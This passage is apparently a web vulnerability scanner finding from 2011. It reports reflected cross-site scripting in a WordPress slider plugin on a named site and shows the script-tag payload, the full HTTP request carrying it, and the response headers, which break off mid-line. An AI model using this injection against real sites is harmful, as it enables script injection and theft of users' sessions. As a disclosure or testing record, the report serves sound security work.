The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bf9"><script>alert(1)</script>06d6b0fc251 was submitted in the REST URL parameter 6. This input was echoed as 95bf9\"><script>alert(1)</script>06d6b0fc251 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider95bf9"><script>alert(1)</script>06d6b0fc251/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/h